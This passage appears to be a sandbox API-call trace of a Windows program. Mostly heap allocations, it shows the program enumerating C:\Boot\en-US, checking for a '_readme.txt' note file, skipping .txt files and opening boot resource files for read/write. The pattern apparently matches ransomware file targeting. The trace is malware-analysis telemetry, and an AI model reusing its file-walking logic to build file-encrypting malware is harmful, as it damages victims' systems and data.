| out: hHeap=0x660000) returned 1 [0058.165] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.165] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0058.165] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0058.165] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.165] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.165] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0058.165] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0058.165] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.165] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.166] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.166] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.166] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.166] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.166] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.166] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.166] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.166] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.166] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.166] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x9c778e8 [0058.166] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.166] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0058.166] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.166] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.166] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5da58 [0058.166] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.166] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.166] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.166] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5da58 [0058.166] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.166] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.166] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.166] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.166] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.166] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.166] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.166] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.166] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.166] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.166] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.166] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.166] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.166] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.166] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.166] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.166] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.167] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.167] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.167] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.167] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.167] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.167] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.167] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.167] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.167] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.167] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.167] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.167] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.167] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.167] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.167] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.167] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x9c778e8 [0058.167] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.167] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0058.167] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.167] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.167] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.167] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.167] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.167] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.167] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0058.167] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0058.167] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.167] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.167] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0058.167] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0058.167] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.167] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.167] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.167] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.167] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.168] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.168] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.168] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.168] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.168] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.168] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.168] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x9c778e8 [0058.168] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.168] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0058.168] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.168] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.168] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5da58 [0058.168] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.168] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.168] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.168] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.168] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.168] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.168] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.168] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.168] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.168] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.168] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.168] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.168] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.168] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.168] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.168] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.168] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.168] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.168] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.168] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.168] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.168] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.168] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.168] PathFindFileNameW (pszPath="C:\\Boot\\en-US\\") returned="en-US\\" [0058.169] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ed88 [0058.169] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.169] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0058.169] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ed88 | out: hHeap=0x660000) returned 1 [0058.169] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0058.169] PathFindFileNameW (pszPath="") returned="" [0058.169] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ed88 [0058.169] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75fd0000 [0058.169] GetProcAddress (hModule=0x75fd0000, lpProcName="SHGetFolderPathW") returned 0x76055708 [0058.169] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x800) returned 0x3268798 [0058.169] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3268798 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0058.169] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x810) returned 0x9c5da58 [0058.169] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.169] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.169] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.169] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ed88 | out: hHeap=0x660000) returned 1 [0058.169] FreeLibrary (hLibModule=0x75fd0000) returned 1 [0058.169] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.169] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0058.169] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.169] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.169] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x81c) returned 0x9c5da58 [0058.169] PathAppendW (in: pszPath="C:\\Boot\\en-US\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\en-US\\_readme.txt") returned 1 [0058.170] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0058.170] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.170] PathFileExistsW (pszPath="C:\\Boot\\en-US\\_readme.txt") returned 1 [0058.170] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.170] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.170] FindFirstFileW (in: lpFileName="C:\\Boot\\en-US\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1ead3730, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ead3730, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68d798 [0058.170] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.170] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1ead3730, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ead3730, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0058.170] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8216d3c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x14c40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0058.170] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.170] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x3216680 [0058.170] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.170] PathFindExtensionW (pszPath="C:\\Boot\\en-US\\bootmgr.exe.mui") returned=".mui" [0058.170] CreateFileW (lpFileName="C:\\Boot\\en-US\\bootmgr.exe.mui" (normalized: "c:\\boot\\en-us\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0058.170] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3216680 | out: hHeap=0x660000) returned 1 [0058.170] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xc3080a8, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xaa50, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0058.170] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.170] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x3216680 [0058.170] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.170] PathFindExtensionW (pszPath="C:\\Boot\\en-US\\memtest.exe.mui") returned=".mui" [0058.170] CreateFileW (lpFileName="C:\\Boot\\en-US\\memtest.exe.mui" (normalized: "c:\\boot\\en-us\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0058.170] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3216680 | out: hHeap=0x660000) returned 1 [0058.171] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ead3730, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1ead3730, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ead3730, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0058.171] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.171] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x3216680 [0058.171] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.171] PathFindExtensionW (pszPath="C:\\Boot\\en-US\\_readme.txt") returned=".txt" [0058.171] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3216680 | out: hHeap=0x660000) returned 1 [0058.171] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ead3730, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1ead3730, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ead3730, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0058.171] FindClose (in: hFindFile=0x68d798 | out: hFindFile=0x68d798) returned 1 [0058.171] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.171] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e950 | out: hHeap=0x660000) returned 1 [0058.171] PeekMessageW (in: lpMsg=0x9f4ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4ff08) returned 0 [0058.171] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e950 [0058.171] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0058.171] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.171] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0058.171] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.171] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.171] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.171] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0058.171] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.171] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.171] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.171] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0058.171] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.171] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.171] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.171] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0058.171] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.171] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.171] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.171] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0058.171] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.172] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.172] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.172] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0058.172] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.172] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.172] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.172] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0058.172] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc2e) returned 0x9c778e8 [0058.172] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.172] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0058.172] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.172] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.172] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0058.172] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.172] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.172] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.172] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0058.172] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.172] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.172] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.172] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0058.172] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0058.172] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.172] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.172] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0058.172] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0058.172] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.172] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.172] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0058.172] HeapFree (in: 